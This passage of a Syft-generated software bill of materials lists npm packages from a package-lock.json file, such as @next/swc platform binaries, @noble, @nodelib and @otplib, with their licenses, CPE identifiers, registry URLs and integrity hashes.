*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-linux-arm64-musl@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz","integrity":"sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw==","dependencies":null}},{"id":"1a0b07449dd69139","name":"@next/swc-linux-x64-gnu","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-linux-x64-gnu@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz","integrity":"sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w==","dependencies":null}},{"id":"2ac68dfe221aa840","name":"@next/swc-linux-x64-musl","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-linux-x64-musl@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz","integrity":"sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ==","dependencies":null}},{"id":"f14dd9ed0ebaa5a4","name":"@next/swc-win32-arm64-msvc","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz","integrity":"sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A==","dependencies":null}},{"id":"0272e47fa12e3e5d","name":"@next/swc-win32-ia32-msvc","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz","integrity":"sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw==","dependencies":null}},{"id":"3812cfa26422b0fa","name":"@next/swc-win32-x64-msvc","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-win32-x64-msvc@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz","integrity":"sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA==","dependencies":null}},{"id":"e6d30724fc0ed7cf","name":"@noble/ciphers","version":"1.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@noble\\/ciphers:\\@noble\\/ciphers:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40noble/ciphers@1.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz","integrity":"sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw==","dependencies":null}},{"id":"447b3d33bb79ef67","name":"@noble/hashes","version":"1.8.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@noble\\/hashes:\\@noble\\/hashes:1.8.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40noble/hashes@1.8.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz","integrity":"sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A==","dependencies":null}},{"id":"f8f74773abf739cd","name":"@nodable/entities","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@nodable\\/entities:\\@nodable\\/entities:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40nodable/entities@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz","integrity":"sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==","dependencies":null}},{"id":"09afc93bd06904eb","name":"@nodelib/fs.scandir","version":"2.1.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@nodelib\\/fs.scandir:\\@nodelib\\/fs.scandir:2.1.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40nodelib/fs.scandir@2.1.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz","integrity":"sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==","dependencies":{"@nodelib/fs.stat":"2.0.5","run-parallel":"^1.1.9"}}},{"id":"e6979906f7b5cde7","name":"@nodelib/fs.stat","version":"2.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@nodelib\\/fs.stat:\\@nodelib\\/fs.stat:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40nodelib/fs.stat@2.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz","integrity":"sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==","dependencies":null}},{"id":"e11d2a355e0d2438","name":"@nodelib/fs.walk","version":"1.2.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@nodelib\\/fs.walk:\\@nodelib\\/fs.walk:1.2.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40nodelib/fs.walk@1.2.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz","integrity":"sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==","dependencies":{"@nodelib/fs.scandir":"2.1.5","fastq":"^1.6.0"}}},{"id":"8d849a9c4c0ebd39","name":"@one-ini/wasm","version":"0.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@one-ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@one-ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@one_ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@one_ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@one:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@one:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40one-ini/wasm@0.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz","integrity":"sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw==","dependencies":null}},{"id":"83e28d5e9e201d09","name":"@opentelemetry/api","version":"1.9.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@opentelemetry\\/api:\\@opentelemetry\\/api:1.9.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40opentelemetry/api@1.9.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz","integrity":"sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q==","dependencies":null}},{"id":"4401cb5cafc706d8","name":"@otplib/core","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@otplib\\/core:\\@otplib\\/core:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40otplib/core@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz","integrity":"sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==","dependencies":null}},{"id":"f17e31d5db2de66e","name":"@otplib/plugin-crypto","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40otplib/plugin-crypto@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz","integrity":"sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==","dependencies":{"@otplib/core":"^12.0.1"}}},{"id":"104b985242c58dc2","name":"@otplib/plugin-thirty-two","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin_thirty_two:12.0.